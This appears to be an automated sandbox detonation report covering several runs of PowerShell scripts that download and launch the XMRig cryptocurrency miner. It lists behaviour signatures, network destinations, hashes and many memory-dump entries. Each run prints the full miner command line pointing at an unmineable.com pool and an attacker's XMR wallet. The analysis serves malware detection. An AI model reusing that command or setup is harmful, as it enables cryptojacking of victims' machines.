memory/2792-71-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-72-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-73-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-74-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-75-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-76-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-77-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-78-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-79-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-80-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-81-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-82-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-83-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-84-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-85-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-86-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-87-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-88-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-89-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-90-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-91-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-92-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-93-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-94-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-95-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-96-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-97-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-98-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-99-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-100-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-101-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-102-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-103-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-104-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-105-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-106-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-107-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-108-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-109-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-110-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-111-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-112-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-113-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-114-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-115-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-116-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

memory/2792-117-0x00007FF6C1EF0000-0x00007FF6C2B23000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:39

Platform

win10v2004-20240426-en

Max time kernel

1796s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp

Files

memory/1396-0-0x00007FFD6EE63000-0x00007FFD6EE65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ecbe4qx3.b1c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1396-10-0x000001A9B6500000-0x000001A9B6522000-memory.dmp

memory/1396-11-0x00007FFD6EE60000-0x00007FFD6F921000-memory.dmp

memory/1396-12-0x00007FFD6EE60000-0x00007FFD6F921000-memory.dmp

memory/1396-14-0x00007FFD6EE60000-0x00007FFD6F921000-memory.dmp

memory/1396-15-0x000001A9B68D0000-0x000001A9B68E2000-memory.dmp

memory/1396-16-0x000001A9B68B0000-0x000001A9B68BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/536-47-0x000001F6B21D0000-0x000001F6B21F0000-memory.dmp

memory/536-48-0x000001F7447A0000-0x000001F7447C0000-memory.dmp

memory/1396-50-0x00007FFD6EE63000-0x00007FFD6EE65000-memory.dmp

memory/536-49-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-51-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/1396-52-0x00007FFD6EE60000-0x00007FFD6F921000-memory.dmp

memory/536-53-0x000001F744BE0000-0x000001F744C00000-memory.dmp

memory/1396-54-0x00007FFD6EE60000-0x00007FFD6F921000-memory.dmp

memory/536-55-0x000001F744E10000-0x000001F744E30000-memory.dmp

memory/536-56-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-57-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-58-0x000001F744BE0000-0x000001F744C00000-memory.dmp

memory/536-59-0x000001F744E10000-0x000001F744E30000-memory.dmp

memory/536-60-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-61-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-62-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-63-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-64-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-65-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-66-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-67-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-68-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-69-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-70-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-71-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-72-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-73-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-74-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-75-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-76-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-77-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-78-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-79-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-80-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-81-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-82-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-83-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-84-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-85-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-86-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-87-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-88-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-89-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-90-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-91-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-92-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-93-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-94-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-95-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-96-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-97-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-98-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-99-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-100-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-101-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-102-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-103-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-104-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-105-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-106-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-107-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-108-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-109-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-110-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-111-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-112-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-113-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-114-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-115-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-116-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-117-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-118-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:26

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.105:443 www.bing.com tcp
US 8.8.8.8:53 105.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.105:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 105.193.132.51.in-addr.arpa udp

Files

memory/3052-0-0x00007FFCBB043000-0x00007FFCBB045000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vt0j345w.zmt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:28

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kap3zvmw.35s.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:45

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dyk3y30p.ejc.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral29

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:54

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1764s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zplrp3vc.maw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:27

Platform

win11-20240419-en

Max time kernel

1799s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

